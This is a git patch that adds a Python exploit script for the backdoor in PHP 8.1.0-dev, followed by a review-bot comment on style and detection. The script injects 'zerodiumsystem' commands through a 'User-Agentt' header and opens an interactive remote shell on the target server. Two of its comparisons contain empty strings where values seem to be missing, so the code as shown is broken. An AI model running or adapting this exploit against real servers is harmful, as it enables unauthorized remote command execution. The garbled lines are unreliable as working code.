From 14d0504e13c115f18d0397756dee998cd36436ee Mon Sep 17 00:00:00 2001
From: Raghuram Subramani
Date: Sat, 24 Sep 2022 01:51:43 -0400
Subject: add agent-t
---
agent-t/exploit.py | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 53 insertions(+)
create mode 100644 agent-t/exploit.py
(limited to 'agent-t/exploit.py')
diff --git a/agent-t/exploit.py b/agent-t/exploit.py
new file mode 100644
index 0000000..3bd6e9d
--- /dev/null
+++ b/agent-t/exploit.py
@@ -0,0 +1,53 @@
+# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+# Date: 23 may 2021
+# Exploit Author: flast101
+# Vendor Homepage: https://www.php.net/
+# Software Link:
+# - https://hub.docker.com/r/phpdaily/php
+# - https://github.com/phpdaily/php
+# Version: 8.1.0-dev
+# Tested on: Ubuntu 20.04
+# References:
+# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+"""
+Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+Contact: flast101.sec@gmail.com
+
+An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+The following exploit uses the backdoor to provide a pseudo shell ont the host.
+"""
+
+#!/usr/bin/env python3
+import os
+import re
+import requests
+
+host = input("Enter the full host url:\n")
+request = requests.Session()
+response = request.get(host)
+
+if str(response) == '':
+ print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+ try:
+ while 1:
+ cmd = input("$ ")
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+ "User-Agentt": "zerodiumsystem('" + cmd + "');"
+ }
+ response = request.get(host, headers = headers, allow_redirects = False)
+ current_page = response.text
+ stdout = current_page.split('',1)
+ text = print(stdout[0])
+ except KeyboardInterrupt:
+ print("Exiting...")
+ exit()
+
+else:
+ print("\r")
+ print(response)
+ print("Host is not available, aborting...")
+ exit()
\ No newline at end of file
-- cgit v1.2.3
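Review bot: The `#!/usr/bin/env python3` line sits below the header comments and the docstring, so it is read as an ordinary comment rather than a shebang, and `import os` / `import re` are not referenced anywhere in the 53 added lines. Move the shebang to line 1 of the file and drop the two unused imports. `text = print(stdout[0])` can likewise be a bare `print(stdout[0])`, because `print` returns `None` and `text` is never read. The header describes the backdoor but gives a defender nothing to match on; a comment such as `# Detection: "User-Agentt" (double t) is not a standard request header; log and alert on any request that carries it.` would make the file more useful as a lab reference. The typos in the docstring and banner string (`ont the host`, `acces`, `crontol`) are worth fixing in the same pass.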